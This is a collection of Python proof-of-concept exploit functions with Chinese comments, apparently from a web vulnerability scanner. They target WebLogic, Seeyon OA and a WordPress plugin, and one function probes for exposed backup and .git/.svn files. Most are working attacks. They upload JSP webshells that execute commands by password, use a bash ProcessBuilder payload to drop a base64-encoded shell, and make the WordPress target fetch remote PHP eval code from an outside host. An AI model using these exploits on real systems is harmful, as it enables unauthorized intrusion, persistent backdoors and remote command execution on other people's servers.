def poc(url): # 首先对url进行处理 # url = "http://www.example.org:7001/default.html?ct=32&op=92&item=98" # --> http://www.example.org:7001 if url[:4] != "http": url = "http://" + url o = urlparse(url) url = o.scheme + "://" + o.netloc # 首先判断attack_url是否可访问 try: attack_url = url + '/_async/AsyncResponseService' r = request.get(url=attack_url, headers=get_headers, timeout=4, verify=False) if r.status_code != 200: return [] except: return [] # 因为不知道目标是linux还是windows,所以直接都检验一遍 # 如果存在漏洞,则将shell路径保存在webshell_path中 webshell_path = [] linux_check_1(url, webshell_path) linux_check_2(url, webshell_path) windows_check_1(url, webshell_path) windows_check_2(url, webshell_path) return webshell_path
def poc(url): # url = "www.example.org/default.html?ct=32&op=92&item=98" # --> http://www.example.org if url[:4] != "http": url = "http://" + url o = urlparse(url) url = o.scheme + "://" + o.netloc headers = { "User-Agent":get_random_ua() } # shell_name can modify it yourself shell_name="config_db1.jsp" shell_url = url + "/seeyon/" + shell_name try: # just prevent being attacked res = request.get(shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False) if res.status_code == 200 and ":-)" in res.text: return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami' except: pass shell_name = "..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\" + shell_name # def_shell content can modufy iy youself def_shell = """<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("fuckxxxx".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>""" def_shell = def_shell.encode() base_header = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkZUFENXlSUUh3TG9pcVJqaWRnNjYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo=" payload_head_len = 283 + len(f_base64encode(shell_name)) payload_shell_len = len(def_shell) payload_shell = def_shell + bytes(hashlib.md5(def_shell).hexdigest(), 'utf-8') payload_shell_name = f_base64encode(shell_name) payload = bytes(base64.b64decode(base_header).decode().replace('355', str(payload_head_len)).replace('666', str( payload_shell_len)).replace('qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdeAD5yRQHwLoiqRjidg66', payload_shell_name), 'utf-8') + payload_shell try: request.post(url=url + "/seeyon/htmlofficeservlet", data=payload, headers=headers, timeout=5, allow_redirects=False, verify=False) res = request.get(url=shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False).text except: return False if ":-)" in res: return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami' else: return False
def poc(url): headers = { "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" } payload = "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search" vulnurl = url + payload try: req = request.get(vulnurl, headers=headers, timeout=10) if r"weblogic.uddi.client.structures.exception.XML_SoapException" in req.text and r"IO Exception on sendMessage" not in req.text: return True else: return False except: return False
def poc(url): # url = "http://www.example.org/default.html?ct=32&op=92&item=98" # --> http://www.example.org if url[:4] != "http": url = "http://" + url o = urlparse(url) url = o.scheme + "://" + o.netloc + payload try: req = request.get(url, headers=headers, timeout=5, allow_redirects=False, verify=False) if req.status_code == 200: return url else: return False except: return False
def bak_scan(url, payloads, result): headers = {"User-Agent": get_random_ua()} while not payloads.empty(): payload = payloads.get() vulnurl = url + "/" + payload try: flag = 0 # 如果是备份文件则不需要下载,只需要head方法获取头部信息即可,否则文件较大会浪费大量的时间 if 'zip' in payload or 'rar' in payload or 'gz' in payload or 'sql' in payload: req = request.head(vulnurl, headers=headers, timeout=5, allow_redirects=False, verify=False) # 404页面 'Content-Type': 'application/octet-stream', # zip 'application/x-zip-compressed' 'application/zip' # rar 'application/octet-stream' 'application/x-rar-compressed' # 采用Content-Type过滤,还是有一定误报 if req.status_code == 200: if 'html' not in req.headers[ 'Content-Type'] and 'image' not in req.headers[ 'Content-Type']: flag = 1 # 当检验git和svn、hg时则需要验证返回内容,get方法 else: req = request.get(vulnurl, headers=headers, timeout=5, verify=False, allow_redirects=False) if req.status_code == 200: if 'svn' in payload: if 'dir' in req.text and 'svn' in req.text: flag = 1 elif 'git' in payload: if 'repository' in req.text: flag = 1 elif 'hg' in payload: if 'hg' in req.text: flag = 1 elif '/WEB-INF/web.xml' in payload: if 'web-app' in req.text: flag = 1 if flag == 1: result.append(vulnurl) except Exception as e: # print(e) continue
def linux_check_2(url, webshell_path): linux_payload_2 = r"""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action> <wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell2.jsp</string> </void> </array> <void method="start"/></void> </work:WorkContext> </soapenv:Header> <soapenv:Body> <asy:onAsyncDelivery/> </soapenv:Body></soapenv:Envelope>""" try: attack_url = url + '/_async/AsyncResponseService' request.post(url=attack_url, data=linux_payload_2, headers=post_headers, timeout=5, verify=False) jsp_path = url + '/bea_wls_internal/webshell2.jsp' time.sleep(1) r = request.get(url=jsp_path, headers=get_headers, timeout=5, verify=False) if r.status_code == 200: webshell_path.append("{}?pwd=123&cmd=whoami".format(jsp_path)) else: pass # print("第二种方式失败") except Exception as e: pass
def poc(url): #处理url if url[:4] != "http": url = "http://" + url o = urlparse(url) url = o.scheme + "://" + o.netloc #判断是否可以访问 try: attack_url = url + '/admin/index/login.html' r = request.get(url=attack_url, headers=get_headers, timeout=4, verify=False) if r.status_code != 200: return [] except: return [] #检查 attach_path=[] fast_check_1(url,attach_path) return attach_path
def poc(url): # url = "http://www.example.org:8080/default.html?ct=32&op=92&item=98" # --> http://www.example.org:8080 if url[:4] != "http": url = "http://" + url o = urlparse(url) url = o.scheme + "://" + o.netloc # 自定义的shell地址,内容为 <pre>eval($_REQUEST['z']);</pre> shellpath = "http://saucer-man.com/aa.txt" ## TODO 需要多余服务的统一整合 # 执行的shell命令 shell = "phpinfo();" vulnurl = url + "/wp-admin/admin-post.php?swp_debug=load_options&swp_url={shellpath}&z={shell}".format( shellpath=shellpath, shell=shell) try: headers = {"User-Agent": get_random_ua()} r = request.get(vulnurl, headers=headers, timeout=5, verify=False, allow_redirects=False) if r.status_code == 200 and "PHP Version" in r.text: return { 'payload': vulnurl, 'post_data': '', 'info': 'wordpress plugin Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE)' } else: return False except: return False